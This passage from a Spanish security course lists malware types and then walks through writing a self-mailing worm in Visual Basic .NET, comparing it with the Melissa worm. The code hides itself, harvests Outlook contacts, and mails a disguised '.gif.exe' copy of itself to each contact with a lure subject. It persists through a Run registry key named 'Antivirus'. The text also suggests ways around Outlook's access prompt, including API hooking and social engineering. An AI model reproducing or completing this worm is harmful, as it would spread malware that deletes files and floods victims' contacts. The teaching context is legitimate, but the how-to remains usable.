TÓPICOS AVANZADOS DE SEGURIDAD COMPUTACIONAL

...

- Botnets.

- Bots.

- Caballo de Troya (Trojan horse).

- Combinación de dos dos más tipos de códigos maliciosos.

- Exploit.

- Gusano (Worm).

- Inundadores (Flooders).

- Keyloggers.

- Mailers y Mass-Mailers.

- Pharming.

- Phishings.

- Programas generadores de correo spam.

- Puerta trasera (Backdoor).

- RootKit a nivel de núcleo.

- RootKit a nivel usuario.

- Virus.

No son todos los tipos de códigos maliciosos existentes, sin embargo, son los más significativos históricamente y que en la actualidad se manifiestan con más frecuencia. Si se desea conocer un panorama más amplio de estas clasificaciones, así como sus definiciones se deben consultar las secciones de referencias y glosario respectivamente.

EJEMPLOS DE CODIGOS MALISIOSOS

En primera instancia explicaremos como escribir un gusano en Visual Basic .net y posteriormente se comparará y explicará el código del gusano Melissa.

Lo primera será crear un nuevo proyecto de Visual Basic .net y clickear dos veces sobre el formulario principal, con esto pasaremos a escribir el código que se ejecutará cuando se cargue el formulario. Introduciremos el siguiente código donde ya se explica en los comentarios el funcionamiento del mismo:

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

Me.Hide()

' Creamos una aplicacion de Outlook

Dim oApp As Outlook.Application = New Outlook.Application Dim oNS As Outlook.NameSpace = oApp.GetNamespace("mapi")

' Nos identificamos como quienes somos los usuarios del sistema ☺ oNS.Logon("", "", False, True)

'Abrimos los contactos *(1)

Dim cContacts As Outlook.MAPIFolder = oNS.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderContacts)

'Definimos las variables necesarias para recorrer los contactos

Dim oItems As Outlook.Items = cContacts.Items Dim oCt As Outlook.ContactItem Dim i As Int16

'Borramos/Modificamos/Grabamos todo aquello que se considere oportuno 'Tendras permiso para hacer todo lo que los permisos del usuario te 'permitan System.IO.File.Delete("C:\archivo.exe") System.IO.File.Copy(Application.ExecutablePath, "C:\FotoDeLaChicSuperMegaGuapa.gif.exe")

'Vamos a mandar los emails ☺ Dim sBodyLen As String Dim oMsg As Outlook._MailItem 'Un objeto email para enviar 'Ruta del fichero que vamos a adjuntar Dim sSource As String = "C:\FotoDeLaChicSuperMegaGuapa4.gif.exe" Dim sDisplayName As String = "FotoDeLaChicSuperMegaGuapa4.exe"

oCt = oItems.GetFirst()

'Recorremos todos los contactos enviando uno por uno los datos

For i = 0 To (oItems.Count() - 1)

Try

oMsg = oApp.CreateItem(Outlook.OlItemType.olMailItem)

'Ponemos un asunto atractivo ☺ oMsg.Subject = "quiero conocerte, te acuerdas de mi?"

'Un texto adecuado

oMsg.Body = "Texto" & vbCr & vbCr

sBodyLen = oMsg.Body.Length

'Adjuntamos

oMsg.Attachments.Add(sSource, , sBodyLen + 1, sDisplayName)

'La direccion a enviar sera la del contacto correspondiente de 'la libreta de direcciones

oMsg.To = oCt.Email1Address

'Enviamos el email :)

oMsg.Send()

'Obtenemos el siguiente contacto

oCt = oItems.GetNext()

Catch ex As Exception

End Try Next

'Colocamos dicho programa en el arranque del sistema

Try Dim runK As RegistryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\Current Version\Run", True)

runK.SetValue("Antivirus", "RUTA") Catch ex As Exception

End Try

Como se puede observar una persona con no demasiados conocimientos podría escribir este código. Actualmente este código no funciona, ya que cuando accedemos a la agenda de direcciones para obtener los contactos se produce una excepción en la cual pierde el control el programa y lanza un mensaje de aviso en el cual pregunta sobre si permitir o no el acceso a dichos datos. Este código se programó en aproximadamente media hora, pero se nos ocurren diferentes métodos para solucionarlo, se podría capturar la llamada a la api y manejar desde el código dicha ventana de aviso o realizar tunneling o simplemente mediante “ingeniería” social en el texto del email “convencer” al receptor de que ese mensaje es lógico y debe aceptarlo para recibir la imagen.

En ejemplo real y similar al anterior fue el gusano Melissa. Fue liberado en Marzo de 1999 y en aquel momento no existía control sobre el acceso a los contactos de Outlook. A pesar de que este virus no realiza ningún efecto dañino contra el sistema, sí tiene efectos secundarios sobre el propio sistema ya que disminuye el rendimiento al estar enviando emails, lo que provoca que la velocidad del tráfico de la red se vea seriamente afectado, provocando grandes pérdidas en las empresas en las que su negocio dependa